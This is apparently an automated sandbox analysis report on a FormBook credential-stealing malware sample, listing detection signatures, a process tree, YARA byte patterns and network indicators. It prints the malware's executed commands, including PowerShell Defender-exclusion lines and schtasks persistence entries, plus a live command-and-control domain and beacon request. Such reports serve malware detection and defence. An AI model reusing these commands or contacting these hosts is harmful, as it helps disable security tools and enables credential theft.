Windows Analysis Report
SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe

Overview

General Information

Sample Name: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe
Analysis ID: 755940
MD5: 55d6460392408d1325c18b69a91c28e3
SHA1: 405847d03be406a0025eda76852dfd46420a8d7a
SHA256: d1e9780a620ddf149c2aed319388bca7ed690c2a58c9ffc8f60b1c4515115dc9
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sigma detected: Scheduled temp file as task from temp location
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe (PID: 3292 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe MD5: 55D6460392408D1325C18B69A91C28E3)
    • powershell.exe (PID: 1012 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1900 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 5356 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp4724.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • FqJXaFxwEj.exe (PID: 5516 cmdline: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe MD5: 55D6460392408D1325C18B69A91C28E3)
    • schtasks.exe (PID: 5080 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp8C7A.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • FqJXaFxwEj.exe (PID: 5108 cmdline: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe MD5: 55D6460392408D1325C18B69A91C28E3)
    • FqJXaFxwEj.exe (PID: 4460 cmdline: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe MD5: 55D6460392408D1325C18B69A91C28E3)
      • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 3628 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup
{"C2 list": ["www.madamkikkiey.net/n2hm/"]}
Source | Rule | Description | Author | Strings
00000007.00000002.390890604.00000000030C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
    0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x102a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x8ed7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8cd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x8781:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x8dd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x8f4f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x79cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xeef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1000a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0xb1d9:$sqlite3step: 68 34 1C 7B E1
      • 0xbd51:$sqlite3step: 68 34 1C 7B E1
      • 0xb21b:$sqlite3text: 68 38 2A 90 C5
      • 0xbd96:$sqlite3text: 68 38 2A 90 C5
      • 0xb232:$sqlite3blob: 68 53 D8 7F 8C
      • 0xbdac:$sqlite3blob: 68 53 D8 7F 8C
      Source | Rule | Description | Author | Strings
      7.2.FqJXaFxwEj.exe.2e02e38.0.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
        7.2.FqJXaFxwEj.exe.2e02e38.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste | Detects executables potentially checking for WinJail sandbox window | ditekSHen
        • 0x2a87a:$v1: SbieDll.dll
        • 0x2a894:$v2: USER
        • 0x2a8a0:$v3: SANDBOX
        • 0x2a8b2:$v4: VIRUS
        • 0x2a902:$v4: VIRUS
        • 0x2a8c0:$v5: MALWARE
        • 0x2a8d2:$v6: SCHMIDTI
        • 0x2a8e6:$v7: CURRENTUSER
        7.2.FqJXaFxwEj.exe.2e20608.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
          7.2.FqJXaFxwEj.exe.2e20608.1.raw.unpack | INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste | Detects executables potentially checking for WinJail sandbox window | ditekSHen
          • 0xd0aa:$v1: SbieDll.dll
          • 0xd0c4:$v2: USER
          • 0xd0d0:$v3: SANDBOX
          • 0xd0e2:$v4: VIRUS
          • 0xd132:$v4: VIRUS
          • 0xd0f0:$v5: MALWARE
          • 0xd102:$v6: SCHMIDTI
          • 0xd116:$v7: CURRENTUSER
          0.2.SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe.2eb0724.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security

            Persistence and Installation Behavior

            Source: Process started | Author: Joe Security | Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp4724.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp4724.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, ParentProcessId: 3292, ParentProcessName: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FqJXaFxwEj" /XML "C:\Users\user\AppData\Local\Temp\tmp4724.tmp, ProcessId: 5356, ProcessName: schtasks.exe
            No Snort rule has matched

            AV Detection

            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe | ReversingLabs: Detection: 29%
            Source: Yara match | File source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: http://www.somethingyourselves.com/n2hm/?bN=9gwJr9Ib0rEc+KDTQOrHkeZIL+750DWB0cIboGlmlHlNjyJ/Euut2Sz1G3s+yPgqLfhiB/VwLZOXrNsbN5gXgWVJl9cnSs3fxA==&TpfpO=3fCD1To0u | Avira URL Cloud: Label: malware
            Source: www.madamkikkiey.net/n2hm/ | Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe | ReversingLabs: Detection: 29%
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe | Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\FqJXaFxwEj.exe | Joe Sandbox ML: detected
            Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.madamkikkiey.net/n2hm/"]}
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.359410400.000000000194A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000002.361323624.0000000001AE0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.355211610.00000000017A7000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 0000000D.00000002.501948554.0000000001950000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.504620671.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.578060777.0000000003720000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.501310955.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.581625002.000000000383F000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.359410400.000000000194A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000002.361323624.0000000001AE0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000009.00000003.355211610.00000000017A7000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 0000000D.00000002.501948554.0000000001950000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.504620671.0000000003588000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.578060777.0000000003720000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000003.501310955.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.581625002.000000000383F000.00000040.00000800.00020000.00000000.sdmp

            Networking

            Source: C:\Windows\explorer.exe | Domain query: www.somethingyourselves.com
            Source: C:\Windows\explorer.exe | Network Connect: 103.193.185.8 80
            Source: Malware configuration extractor | URLs: www.madamkikkiey.net/n2hm/
            Source: Joe Sandbox View | ASN Name: EHOSTIDC-AS-KREHOSTICTKR EHOSTIDC-AS-KREHOSTICTKR
            Source: global traffic | HTTP traffic detected: GET /n2hm/?bN=9gwJr9Ib0rEc+KDTQOrHkeZIL+750DWB0cIboGlmlHlNjyJ/Euut2Sz1G3s+yPgqLfhiB/VwLZOXrNsbN5gXgWVJl9cnSs3fxA==&TpfpO=3fCD1To0u HTTP/1.1 Host: www.somethingyourselves.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox View | IP Address: 103.193.185.8 103.193.185.8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 29 Nov 2022 09:43:45 GMT Server: Apache Content-Type: text/html Content-Length: 1 Vary: Accept-Encoding Connection: close Data Raw: 20 Data Ascii:
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.359675878.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.361866159.0000000003151000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 00000007.00000002.390890604.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, FqJXaFxwEj.exe, 00000007.00000002.388062952.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.359450288.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.359450288.00000000014C7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.como
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000003.313238837.0000000005D88000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.c
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000003.313238837.0000000005D88000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000003.311383849.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000003.311383849.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.come
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000003.311383849.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.comiv
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe, 00000000.00000002.365696843.0000000006F92000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
            Source: 17089-7.17.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: 17089-7.17.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: 17089-7.17.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: cmd.exe, 00000011.00000003.571177133.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, 17089-7.17.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: 17089-7.17.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: cmd.exe, 00000011.00000003.571177133.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, 17089-7.17.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: cmd.exe, 00000011.00000003.571177133.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, 17089-7.17.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
            Source: cmd.exe, 00000011.00000003.571177133.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, 17089-7.17.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
            Source: cmd.exe, 00000011.00000003.571177133.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, 17089-7.17.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
            Source: cmd.exe, 00000011.00000003.571177133.00000000033B5000.00000004.00000020.00020000.00000000.sdmp, 17089-7.17.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: unknown | DNS traffic detected: queries for: www.somethingyourselves.com

            E-Banking Fraud

            Source: Yara match | File source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 7.2.FqJXaFxwEj.exe.2e02e38.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
            Source: 7.2.FqJXaFxwEj.exe.2e20608.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe.2eb0724.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe.2e92f54.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
            Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000E.00000000.488142164.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000E.00000000.461184066.000000000D8E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000011.00000002.573699141.0000000000CF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.361014158.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.501723041.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000011.00000002.574248356.0000000003260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000011.00000002.574000727.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe PID: 5616, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: FqJXaFxwEj.exe PID: 4460, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: cmd.exe PID: 3628, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 7.2.FqJXaFxwEj.exe.2e02e38.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
            Source: 7.2.FqJXaFxwEj.exe.2e20608.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
